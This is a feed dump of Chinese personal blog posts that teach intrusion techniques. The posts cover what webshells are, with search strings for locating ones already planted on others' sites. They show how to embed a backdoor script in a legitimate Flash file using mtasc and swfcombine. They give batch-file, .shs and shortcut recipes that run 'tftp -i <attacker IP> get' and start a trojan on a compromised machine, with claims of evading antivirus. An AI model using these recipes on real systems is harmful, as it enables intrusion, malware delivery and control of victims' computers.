http://507013331.qzone.qq.com Sat, 28 Nov 2009 21:19:14 GMT Qzone zh-cn Copyright (C), 2005-2008, Tencent Tech. Co., Ltd. Tue, 02 Jan 2007 13:52:19 GMT http://507013331.qzone.qq.com/blog/15 要登陆肉鸡，必须知道3个参数：远程电脑的IP、用户名、密码。

webshell是什么？这是很多朋友在疑惑的问题，什么是webshell？今天我们就讲讲这个话题！

webshell是web入侵的脚本攻击工具。简单的说来，webshell就是一个asp或php木马后门，黑客在入侵了一个网站后，常常在将这些asp或php木马后门文件放置在网站服务器的web目录中，与正常的网页文件混在一起。然后黑客就可以用web的方式，通过asp或php木马后门控制网站服务器，包括上传下载文件、查看数据库、执行任意程序命令等。

为了更好理解webshell我们学习两个概念：

什么是“木马”？“木马”全称是“特洛伊木马(Trojan Horse)”，原指古希腊士兵藏在木马内进入敌方城市从而占领敌方城市的故事。在Internet上，“特洛伊木马”指一些程序设计人员在其可从网络上下载(Download)的应用程序或游戏中，包含了可以控制用户的计算机系统的程序，可能造成用户的系统被破坏甚至瘫痪。

什么是后门？大家都知道，一台计算机上有65535个端口，那么如果把计算机看作是一间屋子，那么这65535个端口就可以它看做是计算机为了与外界连接所开的65535扇门。每个门的背后都是一个服务。有的门是主人特地打开迎接客人的（提供服务），有的门是主人为了出去访问客人而开设的（访问远程服务）——理论上，剩下的其他门都该是关闭着的，但偏偏由于各种原因，很多门都是开启的。于是就有好事者进入，主人的隐私被刺探，生活被打扰，甚至屋里的东西也被搞得一片狼迹。这扇悄然被开启的门——就是“后门”。 webshell的优点

webshell 最大的优点就是可以穿越防火墙，由于与被控制的服务器或远程主机交换的数据都是通过80端口传递的，因此不会被防火墙拦截。并且使用webshell一般不会在系统日志中留下记录，只会在网站的web日志中留下一些数据提交记录，没有经验的管理员是很难看出入侵痕迹的。

如何寻找webshel：

1，脚本攻击SQL注入

2，使用注入工具

3，在浏览器里打开百度,输入搜索关键词"在本页操作不需要FSO支持&"或者"一次只能执行一个操作",然后点击搜索,很快就可以看到检索到了大量的查询结果.

]]> http://507013331.qzone.qq.com/blog/15#comment 512 Tue, 02 Jan 2007 13:52:19 GMT http://507013331.qzone.qq.com/blog/15 http://507013331.qzone.qq.com/blog/13 先将
class Backdoor {
function Backdoor() {
}

static function main(mc) {
getURL("javascript:alert(''hello from backdoor'')");
}
}
作为初始脚本，写入记事本，保存为backdoor.as，然后用软件将其编译为backdoor.swf文件。
将事先准备好的正常的一段flash用合并器将其与backdoor.swf结合生成含有此脚本的swf文件。

c:\Mtasc\mtasc.exe -swf backdoor.swf -main -header 500:365:24 backdoor.as
c:\Swftools\swfcombine.exe -o 1_backdoored.swf -T backdoor.swf 1.swf

这样执行1_backdoored.swf 。测试了一下，会闪过一个新打开的IE窗口，闪过弹出的对话框，不过速度很快。

国内的我看了下用工具直接插入木马
比如臭要饭的Icode to SWF Flash插马器，类似的直接插入工具很多，这是两种不同的方法，
国外的方法提出优势如下，原文：
First of all, wrapping your malicious code inside flash files will bypass all XSS filtering systems, simply becouse they don’t understand how to read SWF files not to mention that even if they know how to do that, it would be highly inefficient approach.

The second thing is that attackers are able to infect popular video, audio and interactive material and spread it on the web. This approach can be quite easily defined as viral infection. The next time you visit youtube.com or video.google.com beware that what you see might not be what you get. Sneeky JavaScript code can scan your internal LAN, hack into your WIFI router and enable the admin inte***ce on the Internet side so attackers have direct access to you, your personal details and your bank account numbers.

I don’t want to cover DDOS attacks because it is getting scary.

想请大家探讨一下哪种方法效果更好、更有威胁性些。原文出处：http://www.gnucitizen.org/blog/backdooring-flash-objects/
软件下载地址：
http://www.mtasc.org/#download Windows precompiled binary, zipped : mtasc-1.12.zip 解压缩后cmd下使用
http://www.swftools.org/download.html
Windows Version (Binaries): swftool*-0.7.0.**e 安装后目录下有swfcombine.exe,cmd下使用
]]> http://507013331.qzone.qq.com/blog/13#comment 512 Tue, 02 Jan 2007 13:49:00 GMT http://507013331.qzone.qq.com/blog/13 http://507013331.qzone.qq.com/blog/10
第一种方法:
1. 下载个tftp软件,设置好目录，把要下载的木马设置的目录里面
2,新建个批处理文件
输入下载命令
@echo off
@tftp -i 127.0.0.1 get 11.txt
@start 11.txt
保存
上传到肉鸡上运行
第二种方法:
1. 下载个tftp软件,设置好目录，把要下载的木马设置的目录里面
2.新建一个写字板文件
在菜单中选择 插入 （插入对象）选择有文件创建，随便选一个文件图标
会在编辑区出现一个文件图表
选择编辑 对象包对象 编辑对象包 出现对象包编辑的窗口 选择编辑 命令行
在命令行中插入
cmd.exe /c tftp -i 127.0.0.1 get 11.txt&&start 11.txt
确定保存，
回到编辑界面 鼠标左键按着文件图表，拽到桌面的任意空白地方，
会产生一个.shs文件，，上传肉鸡运行
第三中方法:
1. 下载个tftp软件,设置好目录，把要下载的木马设置的目录里面新建一个快捷方式
选择一个文件 和名称，最后点击文件属性，在
命令栏中输入cmd.exe /c tftp -i 127.0.0.1 get 11.txt&&start 11.txt
运行方式选择最小化
这样运行是出现的窗口不太明显

其中127.0.0.1 换成你自己的ip地址;
11.txt替换成你的木马文件
&符号允许在一行中使用2个以上不同的命令，当第一个命令执行失败将不影响第2个
&&符号也是允许在一行中使用2个以上不同的命令，当第一个命令执行失败后后续的命令将不会再被执行。
也可以把&&换成&
这样生成的下载者永远也不会被查杀。
]]> http://507013331.qzone.qq.com/blog/10#comment 512 Wed, 20 Dec 2006 17:24:37 GMT http://507013331.qzone.qq.com/blog/10